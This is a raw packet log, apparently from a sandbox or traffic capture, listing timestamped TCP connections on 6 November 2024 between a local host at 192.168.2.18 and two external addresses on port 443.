                                                                                                                                              Nov 6, 2024 16:56:02.202702999 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.202708960 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.202733040 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.202748060 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.203002930 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.203102112 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.203226089 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.203228951 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.204858065 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.206471920 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.206490993 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.207000971 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.207051992 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.207118988 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.210396051 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.210428953 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.211971045 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212053061 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212085962 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212116003 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212125063 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.212141037 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212157965 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.212179899 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212260008 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.212265968 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212337017 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212366104 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212428093 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.212438107 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212505102 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.212589025 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212752104 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212759972 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.212806940 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.212814093 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.213634014 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.213675022 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.213680983 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.213690996 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.213716030 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.213720083 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.213757038 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.213766098 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.213838100 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.214471102 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.214535952 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.214584112 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.214622021 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.214628935 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.214634895 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.214673042 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.214723110 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.214765072 CET44349849188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.214831114 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.215141058 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.215158939 CET44349849188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.215539932 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.215600014 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.215611935 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.215666056 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.216308117 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.216358900 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.216365099 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.216391087 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.216429949 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.216500998 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.216517925 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.216556072 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.216557026 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.218755007 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.218807936 CET44349850188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.218883991 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.220634937 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.220649958 CET44349850188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.475425005 CET44349846188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.475754023 CET44349847188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.475761890 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.475807905 CET44349846188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.475927114 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.475939989 CET44349847188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.476907015 CET44349847188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.476998091 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477257967 CET44349846188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.477276087 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477284908 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477324009 CET44349847188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.477324963 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.477334976 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477391958 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477618933 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477664948 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.477737904 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.477871895 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.477884054 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.477909088 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.478008986 CET44349846188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.478060961 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.478081942 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.478126049 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.478187084 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.478228092 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.478239059 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.478357077 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.478378057 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.484184980 CET44349845188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.484390974 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.484404087 CET44349845188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.485380888 CET44349845188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.485436916 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.485831022 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.485861063 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.485914946 CET44349845188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.485918045 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.485970020 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.486236095 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.486268044 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.486356020 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.486558914 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.486569881 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.637943983 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.638120890 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.638184071 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.638190031 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.638310909 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.639296055 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.639321089 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.640929937 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.640974045 CET44349854188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.641752958 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.642060041 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.642071009 CET44349854188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.642784119 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.642817974 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.643140078 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.643430948 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.643440962 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.822851896 CET44349849188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.823149920 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.823180914 CET44349849188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.824255943 CET44349849188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.824357986 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.824667931 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.824667931 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.824709892 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.824732065 CET44349849188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.824789047 CET49849443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.824997902 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.825027943 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.825097084 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.825289011 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:02.825303078 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.836607933 CET44349850188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.836836100 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.836862087 CET44349850188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.837874889 CET44349850188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.837930918 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838219881 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838229895 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838268042 CET44349850188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.838272095 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838304996 CET49850443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838521004 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838562965 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.838629961 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838798046 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.838805914 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.846929073 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.847171068 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.847191095 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.848225117 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.848284960 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848551989 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848566055 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848602057 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848615885 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.848764896 CET44349848188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.848828077 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848828077 CET49848443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848884106 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.848908901 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.849013090 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.849415064 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.849426031 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.085156918 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.085448980 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.085475922 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.086553097 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.086641073 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.087080956 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.087146044 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.087272882 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.100164890 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.102080107 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.102092028 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.103142023 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.103204012 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.103591919 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.103638887 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.103837013 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.103842974 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.119575024 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.119811058 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.119832039 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.121062994 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.121130943 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.121512890 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.121570110 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.121766090 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.121774912 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.127331018 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.138998985 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.139025927 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.155011892 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.171024084 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.187015057 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.254641056 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.254977942 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.254992008 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.256499052 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.256576061 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.256870985 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.256886959 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.256932020 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.256966114 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.257148027 CET44349855188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.257204056 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.257230043 CET49855443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.257270098 CET49859443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.257344007 CET44349859188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.257453918 CET49859443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.257692099 CET49859443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.257704020 CET44349859188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.281647921 CET44349854188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.281917095 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.281944990 CET44349854188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.283001900 CET44349854188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.283077955 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.283390999 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.283404112 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.283462048 CET44349854188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.283488989 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.283509970 CET49854443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.283725023 CET49860443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.283762932 CET44349860188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.283849001 CET49860443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.284037113 CET49860443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.284051895 CET44349860188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.448777914 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.451702118 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.451716900 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.452786922 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.452855110 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.453205109 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.453267097 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.453504086 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.453511000 CET44349856188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.463553905 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.463829041 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.463841915 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.464915991 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.465010881 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.465372086 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.465444088 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.465615988 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.465624094 CET44349858188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.505004883 CET49856443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.505023956 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.505290031 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.505317926 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.506381035 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.506445885 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.506803989 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.506870985 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.506994963 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.507005930 CET44349857188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.520992994 CET49858443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.553009033 CET49857443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.571280003 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.571346998 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.571459055 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.571517944 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.571531057 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.571629047 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.571818113 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.572650909 CET49851443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.572674036 CET44349851188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.573040962 CET49852443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.573060989 CET44349852188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.574975967 CET49861443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.575026035 CET44349861188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.575160980 CET49861443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.575428963 CET49861443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.575442076 CET44349861188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.576678038 CET49862443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.576716900 CET44349862188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.576785088 CET49862443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.577038050 CET49862443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:03.577058077 CET44349862188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.651808023 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.651916981 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.652050972 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.652970076 CET49853443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.652992964 CET44349853188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:03.654319048 CET49863443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:03.654356003 CET44349863188.114.97.3192.168.2.18
